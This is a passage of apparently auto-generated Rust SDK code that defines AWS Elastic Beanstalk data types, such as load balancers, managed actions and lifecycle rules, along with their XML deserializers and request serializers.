seconds.</p>"] pub p85: Option<NullableDouble>, #[doc="<p>The average latency for the slowest 10 percent of requests over the last 10 seconds.</p>"] pub p90: Option<NullableDouble>, #[doc="<p>The average latency for the slowest 5 percent of requests over the last 10 seconds.</p>"] pub p95: Option<NullableDouble>, #[doc="<p>The average latency for the slowest 1 percent of requests over the last 10 seconds.</p>"] pub p99: Option<NullableDouble>, #[doc="<p>The average latency for the slowest 0.1 percent of requests over the last 10 seconds.</p>"] pub p999: Option<NullableDouble>, } struct LatencyDeserializer; impl LatencyDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<Latency, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = Latency::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] 
{ "P10" => { obj.p10 = Some(try!(NullableDoubleDeserializer::deserialize("P10", stack))); } "P50" => { obj.p50 = Some(try!(NullableDoubleDeserializer::deserialize("P50", stack))); } "P75" => { obj.p75 = Some(try!(NullableDoubleDeserializer::deserialize("P75", stack))); } "P85" => { obj.p85 = Some(try!(NullableDoubleDeserializer::deserialize("P85", stack))); } "P90" => { obj.p90 = Some(try!(NullableDoubleDeserializer::deserialize("P90", stack))); } "P95" => { obj.p95 = Some(try!(NullableDoubleDeserializer::deserialize("P95", stack))); } "P99" => { obj.p99 = Some(try!(NullableDoubleDeserializer::deserialize("P99", stack))); } "P999" => { obj.p999 = Some(try!(NullableDoubleDeserializer::deserialize("P999", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Describes an Auto Scaling launch configuration.</p>"] #[derive(Default,Debug,Clone)] pub struct LaunchConfiguration { #[doc="<p>The name of the launch configuration.</p>"] pub name: Option<ResourceId>, } struct LaunchConfigurationDeserializer; impl LaunchConfigurationDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<LaunchConfiguration, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = LaunchConfiguration::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Name" => { obj.name = Some(try!(ResourceIdDeserializer::deserialize("Name", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type LaunchConfigurationList = Vec<LaunchConfiguration>; struct LaunchConfigurationListDeserializer; impl LaunchConfigurationListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<LaunchConfigurationList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(LaunchConfigurationDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } pub type LaunchedAt = String; struct LaunchedAtDeserializer; impl LaunchedAtDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<LaunchedAt, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>A list of available AWS Elastic Beanstalk solution stacks.</p>"] #[derive(Default,Debug,Clone)] pub struct ListAvailableSolutionStacksResultMessage { #[doc="<p> A list of available solution stacks and their <a>SolutionStackDescription</a>. 
</p>"] pub solution_stack_details: Option<AvailableSolutionStackDetailsList>, #[doc="<p>A list of available solution stacks.</p>"] pub solution_stacks: Option<AvailableSolutionStackNamesList>, } struct ListAvailableSolutionStacksResultMessageDeserializer; impl ListAvailableSolutionStacksResultMessageDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ListAvailableSolutionStacksResultMessage, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ListAvailableSolutionStacksResultMessage::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "SolutionStackDetails" => { obj.solution_stack_details = Some(try!(AvailableSolutionStackDetailsListDeserializer::deserialize("SolutionStackDetails", stack))); } "SolutionStacks" => { obj.solution_stacks = Some(try!(AvailableSolutionStackNamesListDeserializer::deserialize("SolutionStacks", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Describes the properties of a Listener for the LoadBalancer.</p>"] #[derive(Default,Debug,Clone)] pub struct Listener { #[doc="<p>The port that is used by the Listener.</p>"] pub port: Option<Integer>, #[doc="<p>The protocol that is used by the Listener.</p>"] pub protocol: Option<String>, } struct ListenerDeserializer; impl ListenerDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<Listener, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = Listener::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Port" => { obj.port = Some(try!(IntegerDeserializer::deserialize("Port", stack))); } "Protocol" => { obj.protocol = Some(try!(StringDeserializer::deserialize("Protocol", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type LoadAverage = Vec<LoadAverageValue>; struct LoadAverageDeserializer; impl LoadAverageDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<LoadAverage, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. 
})) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(LoadAverageValueDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } pub type LoadAverageValue = f64; struct LoadAverageValueDeserializer; impl LoadAverageValueDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<LoadAverageValue, XmlParseError> { try!(start_element(tag_name, stack)); let obj = f64::from_str(try!(characters(stack)).as_ref()).unwrap(); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Describes a LoadBalancer.</p>"] #[derive(Default,Debug,Clone)] pub struct LoadBalancer { #[doc="<p>The name of the LoadBalancer.</p>"] pub name: Option<ResourceId>, } struct LoadBalancerDeserializer; impl LoadBalancerDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<LoadBalancer, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = LoadBalancer::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Name" => { obj.name = Some(try!(ResourceIdDeserializer::deserialize("Name", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Describes the details of a LoadBalancer.</p>"] #[derive(Default,Debug,Clone)] pub struct LoadBalancerDescription { #[doc="<p>The domain name of the LoadBalancer.</p>"] pub domain: Option<String>, #[doc="<p>A list of Listeners used by the LoadBalancer.</p>"] pub listeners: Option<LoadBalancerListenersDescription>, #[doc="<p>The name of the LoadBalancer.</p>"] pub load_balancer_name: Option<String>, } struct LoadBalancerDescriptionDeserializer; impl LoadBalancerDescriptionDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<LoadBalancerDescription, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = LoadBalancerDescription::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] 
{ "Domain" => { obj.domain = Some(try!(StringDeserializer::deserialize("Domain", stack))); } "Listeners" => { obj.listeners = Some(try!(LoadBalancerListenersDescriptionDeserializer::deserialize("Listeners", stack))); } "LoadBalancerName" => { obj.load_balancer_name = Some(try!(StringDeserializer::deserialize("LoadBalancerName", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type LoadBalancerList = Vec<LoadBalancer>; struct LoadBalancerListDeserializer; impl LoadBalancerListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<LoadBalancerList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(LoadBalancerDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } pub type LoadBalancerListenersDescription = Vec<Listener>; struct LoadBalancerListenersDescriptionDeserializer; impl LoadBalancerListenersDescriptionDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<LoadBalancerListenersDescription, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(ListenerDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } #[doc="<p>The record of an upcoming or in-progress managed action.</p>"] #[derive(Default,Debug,Clone)] pub struct ManagedAction { #[doc="<p>A description of the managed action.</p>"] pub action_description: Option<String>, #[doc="<p>A unique identifier for the managed action.</p>"] pub action_id: Option<String>, #[doc="<p>The type of managed action.</p>"] pub action_type: Option<ActionType>, #[doc="<p>The status of the managed action. If the action is <code>Scheduled</code>, you can apply it immediately with <a>ApplyEnvironmentManagedAction</a>.</p>"] pub status: Option<ActionStatus>, #[doc="<p>The start time of the maintenance window in which the managed action will execute.</p>"] pub window_start_time: Option<Timestamp>, } struct ManagedActionDeserializer; impl ManagedActionDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ManagedAction, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ManagedAction::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. 
})) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "ActionDescription" => { obj.action_description = Some(try!(StringDeserializer::deserialize("ActionDescription", stack))); } "ActionId" => { obj.action_id = Some(try!(StringDeserializer::deserialize("ActionId", stack))); } "ActionType" => { obj.action_type = Some(try!(ActionTypeDeserializer::deserialize("ActionType", stack))); } "Status" => { obj.status = Some(try!(ActionStatusDeserializer::deserialize("Status", stack))); } "WindowStartTime" => { obj.window_start_time = Some(try!(TimestampDeserializer::deserialize("WindowStartTime", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>The record of a completed or failed managed action.</p>"] #[derive(Default,Debug,Clone)] pub struct ManagedActionHistoryItem { #[doc="<p>A description of the managed action.</p>"] pub action_description: Option<String>, #[doc="<p>A unique identifier for the managed action.</p>"] pub action_id: Option<String>, #[doc="<p>The type of the managed action.</p>"] pub action_type: Option<ActionType>, #[doc="<p>The date and time that the action started executing.</p>"] pub executed_time: Option<Timestamp>, #[doc="<p>If the action failed, a description of the failure.</p>"] pub failure_description: Option<String>, #[doc="<p>If the action failed, the type of failure.</p>"] pub failure_type: Option<FailureType>, #[doc="<p>The date and time that the action finished executing.</p>"] pub finished_time: Option<Timestamp>, #[doc="<p>The status of the action.</p>"] pub status: Option<ActionHistoryStatus>, } struct ManagedActionHistoryItemDeserializer; impl ManagedActionHistoryItemDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ManagedActionHistoryItem, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ManagedActionHistoryItem::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] 
{ "ActionDescription" => { obj.action_description = Some(try!(StringDeserializer::deserialize("ActionDescription", stack))); } "ActionId" => { obj.action_id = Some(try!(StringDeserializer::deserialize("ActionId", stack))); } "ActionType" => { obj.action_type = Some(try!(ActionTypeDeserializer::deserialize("ActionType", stack))); } "ExecutedTime" => { obj.executed_time = Some(try!(TimestampDeserializer::deserialize("ExecutedTime", stack))); } "FailureDescription" => { obj.failure_description = Some(try!(StringDeserializer::deserialize("FailureDescription", stack))); } "FailureType" => { obj.failure_type = Some(try!(FailureTypeDeserializer::deserialize("FailureType", stack))); } "FinishedTime" => { obj.finished_time = Some(try!(TimestampDeserializer::deserialize("FinishedTime", stack))); } "Status" => { obj.status = Some(try!(ActionHistoryStatusDeserializer::deserialize("Status", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type ManagedActionHistoryItems = Vec<ManagedActionHistoryItem>; struct ManagedActionHistoryItemsDeserializer; impl ManagedActionHistoryItemsDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ManagedActionHistoryItems, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(ManagedActionHistoryItemDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } pub type ManagedActions = Vec<ManagedAction>; struct ManagedActionsDeserializer; impl ManagedActionsDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ManagedActions, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. 
})) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(ManagedActionDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } #[doc="<p>A lifecycle rule that deletes application versions after the specified number of days.</p>"] #[derive(Default,Debug,Clone)] pub struct MaxAgeRule { #[doc="<p>Set to <code>true</code> to delete a version's source bundle from Amazon S3 when Elastic Beanstalk deletes the application version.</p>"] pub delete_source_from_s3: Option<BoxedBoolean>, #[doc="<p>Specify <code>true</code> to apply the rule, or <code>false</code> to disable it.</p>"] pub enabled: BoxedBoolean, #[doc="<p>Specify the number of days to retain an application version.</p>"] pub max_age_in_days: Option<BoxedInt>, } struct MaxAgeRuleDeserializer; impl MaxAgeRuleDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<MaxAgeRule, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = MaxAgeRule::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "DeleteSourceFromS3" => { obj.delete_source_from_s3 = Some(try!(BoxedBooleanDeserializer::deserialize("DeleteSourceFromS3", stack))); } "Enabled" => { obj.enabled = try!(BoxedBooleanDeserializer::deserialize("Enabled", stack)); } "MaxAgeInDays" => { obj.max_age_in_days = Some(try!(BoxedIntDeserializer::deserialize("MaxAgeInDays", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } /// Serialize `MaxAgeRule` contents to a `SignedRequest`.
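/// As an illustration (the prefix is chosen by the caller, not fixed here): a rule with
/// `enabled = true` and `max_age_in_days = Some(180)` serialized under a hypothetical
/// prefix `VersionLifecycleConfig.MaxAgeRule` yields
/// `VersionLifecycleConfig.MaxAgeRule.Enabled=true` and
/// `VersionLifecycleConfig.MaxAgeRule.MaxAgeInDays=180`; `DeleteSourceFromS3` is omitted
/// while it is `None`.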
struct MaxAgeRuleSerializer; impl MaxAgeRuleSerializer { fn serialize(params: &mut Params, name: &str, obj: &MaxAgeRule) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.delete_source_from_s3 { params.put(&format!("{}{}", prefix, "DeleteSourceFromS3"), &field_value.to_string()); } params.put(&format!("{}{}", prefix, "Enabled"), &obj.enabled.to_string()); if let Some(ref field_value) = obj.max_age_in_days { params.put(&format!("{}{}", prefix, "MaxAgeInDays"), &field_value.to_string()); } } } #[doc="<p>A lifecycle rule that deletes the oldest application version when the maximum count is exceeded.</p>"] #[derive(Default,Debug,Clone)] pub struct MaxCountRule { #[doc="<p>Set to <code>true</code> to delete a version's source bundle from Amazon S3 when Elastic Beanstalk deletes the application version.</p>"] pub delete_source_from_s3: Option<BoxedBoolean>, #[doc="<p>Specify <code>true</code> to apply the rule, or <code>false</code> to disable it.</p>"] pub enabled: BoxedBoolean, #[doc="<p>Specify the maximum number of application versions to retain.</p>"] pub max_count: Option<BoxedInt>, } struct MaxCountRuleDeserializer; impl MaxCountRuleDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<MaxCountRule, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = MaxCountRule::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "DeleteSourceFromS3" => { obj.delete_source_from_s3 = Some(try!(BoxedBooleanDeserializer::deserialize("DeleteSourceFromS3", stack))); } "Enabled" => { obj.enabled = try!(BoxedBooleanDeserializer::deserialize("Enabled", stack)); } "MaxCount" => { obj.max_count = Some(try!(BoxedIntDeserializer::deserialize("MaxCount", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } /// Serialize `MaxCountRule` contents to a `SignedRequest`. 
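/// Mirrors the field types above: the required `Enabled` flag is always written, while
/// `DeleteSourceFromS3` and `MaxCount` are emitted only when `Some`.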
struct MaxCountRuleSerializer; impl MaxCountRuleSerializer { fn serialize(params: &mut Params, name: &str, obj: &MaxCountRule) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.delete_source_from_s3 { params.put(&format!("{}{}", prefix, "DeleteSourceFromS3"), &field_value.to_string()); } params.put(&format!("{}{}", prefix, "Enabled"), &obj.enabled.to_string()); if let Some(ref field_value) = obj.max_count { params.put(&format!("{}{}", prefix, "MaxCount"), &field_value.to_string()); } } } pub type MaxRecords = i64; pub type Message = String; struct MessageDeserializer; impl MessageDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<Message, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type NextToken = String; struct NextTokenDeserializer; impl NextTokenDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<NextToken, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type NonEmptyString = String; pub type NullableDouble = f64; struct NullableDoubleDeserializer; impl NullableDoubleDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<NullableDouble, XmlParseError> { try!(start_element(tag_name, stack)); let obj = f64::from_str(try!(characters(stack)).as_ref()).unwrap(); try!(end_element(tag_name, stack)); Ok(obj) } } pub type NullableInteger = i64; struct NullableIntegerDeserializer; impl NullableIntegerDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<NullableInteger, XmlParseError> { try!(start_element(tag_name, stack)); let obj = i64::from_str(try!(characters(stack)).as_ref()).unwrap(); try!(end_element(tag_name, stack)); Ok(obj) } } pub type NullableLong = i64; struct NullableLongDeserializer; impl NullableLongDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<NullableLong, XmlParseError> { try!(start_element(tag_name, stack)); let obj = i64::from_str(try!(characters(stack)).as_ref()).unwrap(); try!(end_element(tag_name, stack)); Ok(obj) } } pub type OptionNamespace = String; struct OptionNamespaceDeserializer; impl OptionNamespaceDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<OptionNamespace, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type OptionRestrictionMaxLength = i64; struct OptionRestrictionMaxLengthDeserializer; impl OptionRestrictionMaxLengthDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<OptionRestrictionMaxLength, XmlParseError> { try!(start_element(tag_name, stack)); let obj = i64::from_str(try!(characters(stack)).as_ref()).unwrap(); try!(end_element(tag_name, stack)); Ok(obj) } } pub type OptionRestrictionMaxValue = i64; struct OptionRestrictionMaxValueDeserializer; impl OptionRestrictionMaxValueDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<OptionRestrictionMaxValue, XmlParseError> { 
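// Scalar pattern shared by the numeric deserializers: consume the start tag, parse the
// character data, consume the end tag. Note that the parse result is unwrapped, so a
// non-numeric payload from the service would panic rather than surface as XmlParseError.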
try!(start_element(tag_name, stack)); let obj = i64::from_str(try!(characters(stack)).as_ref()).unwrap(); try!(end_element(tag_name, stack)); Ok(obj) } } pub type OptionRestrictionMinValue = i64; struct OptionRestrictionMinValueDeserializer; impl OptionRestrictionMinValueDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<OptionRestrictionMinValue, XmlParseError> { try!(start_element(tag_name, stack)); let obj = i64::from_str(try!(characters(stack)).as_ref()).unwrap(); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>A regular expression representing a restriction on a string configuration option value.</p>"] #[derive(Default,Debug,Clone)] pub struct OptionRestrictionRegex { #[doc="<p>A unique name representing this regular expression.</p>"] pub label: Option<RegexLabel>, #[doc="<p>The regular expression pattern that a string configuration option value with this restriction must match.</p>"] pub pattern: Option<RegexPattern>, } struct OptionRestrictionRegexDeserializer; impl OptionRestrictionRegexDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<OptionRestrictionRegex, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = OptionRestrictionRegex::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Label" => { obj.label = Some(try!(RegexLabelDeserializer::deserialize("Label", stack))); } "Pattern" => { obj.pattern = Some(try!(RegexPatternDeserializer::deserialize("Pattern", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>A specification identifying an individual configuration option.</p>"] #[derive(Default,Debug,Clone)] pub struct OptionSpecification { #[doc="<p>A unique namespace identifying the option's associated AWS resource.</p>"] pub namespace: Option<OptionNamespace>, #[doc="<p>The name of the configuration option.</p>"] pub option_name: Option<ConfigurationOptionName>, #[doc="<p>A unique resource name for a time-based scaling configuration option.</p>"] pub resource_name: Option<ResourceName>, } /// Serialize `OptionSpecification` contents to a `SignedRequest`. struct OptionSpecificationSerializer; impl OptionSpecificationSerializer { fn serialize(params: &mut Params, name: &str, obj: &OptionSpecification) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.namespace { params.put(&format!("{}{}", prefix, "Namespace"), &field_value); } if let Some(ref field_value) = obj.option_name { params.put(&format!("{}{}", prefix, "OptionName"), &field_value); } if let Some(ref field_value) = obj.resource_name { params.put(&format!("{}{}", prefix, "ResourceName"), &field_value); } } } pub type OptionsSpecifierList = Vec<OptionSpecification>; /// Serialize `OptionsSpecifierList` contents to a `SignedRequest`. 
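/// Lists use the Query-protocol `member` convention with 1-based indices: the first
/// `OptionSpecification` in a list named `OptionsToRemove` is written as
/// `OptionsToRemove.member.1.Namespace`, `OptionsToRemove.member.1.OptionName`, and so on.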
struct OptionsSpecifierListSerializer; impl OptionsSpecifierListSerializer { fn serialize(params: &mut Params, name: &str, obj: &OptionsSpecifierList) { for (index, obj) in obj.iter().enumerate() { let key = format!("{}.member.{}", name, index+1); OptionSpecificationSerializer::serialize(params, &key, obj); } } } #[doc="<p>Describes a queue.</p>"] #[derive(Default,Debug,Clone)] pub struct Queue { #[doc="<p>The name of the queue.</p>"] pub name: Option<String>, #[doc="<p>The URL of the queue.</p>"] pub url: Option<String>, } struct QueueDeserializer; impl QueueDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<Queue, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = Queue::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Name" => { obj.name = Some(try!(StringDeserializer::deserialize("Name", stack))); } "URL" => { obj.url = Some(try!(StringDeserializer::deserialize("URL", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, 